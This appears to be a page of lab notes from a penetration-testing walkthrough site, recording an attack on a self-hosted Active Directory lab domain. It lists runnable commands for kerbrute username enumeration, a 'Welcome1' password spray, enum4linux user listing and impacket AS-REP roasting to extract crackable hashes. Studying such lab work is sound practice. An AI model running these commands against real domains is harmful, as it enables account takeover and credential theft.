💻
Cyanide Security - Walkthroughs
Cheat Sheets
  • Welcome
    • Welcome
  • Proving Grounds
    • Snookums
    • Image
    • Extplorer
    • Blackgate
    • Cockpit
    • MZEEAV
    • Quackerjack
    • Pelican
    • Ochima
    • Squid
    • pyLoader
    • Detection
    • Pipe
    • Pebbles
    • Muddy
    • Exfiltrated
    • Wombo
    • RubyDome
    • Bratarina
    • Exghost
    • Hub
  • Hack The Box
    • HTB - Coming Soon
  • TryHackMe
    • THM - Coming Soon
  • CTF
    • CTF - Coming Soon
  • Self Hosted
    • Dev
    • Butler
    • Active Directory
      • Lab Creation
      • Lab Notes
Powered by GitBook
On this page
  1. Self Hosted
  2. Active Directory

Lab Notes

  • Guess names of valid accounts from statistically likely usernames

    • produce custom list using base lists, as format used by environment did not already have corresponding wordlist

    • kerbrute_linux_amd64 userenum --dc 192.168.1.200 -d acme.local ./statistically-likely-usernames/john_smith.txt

  • Perform password spray across all discovered usernames with "Welcome1"

    • kerbrute_linux_amd64 passwordspray -d acme.local --dc 192.168.1.200 valid_usernames.txt Welcome1

    • password spray was successful for user chris_nelson

  • Get list of all domain users

    • enum4linux -U -u chris_nelson -p Welcome1 192.168.1.200

  • Get list of ASREP Roastable users and their hashes for cracking

    • python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile all_usernames.txt -request -format hashcat -outputfile ASREP_roastable_users_hashes.txt -dc-ip 192.168.1.200 'ACME/'

PreviousLab Creation

Last updated 1 year ago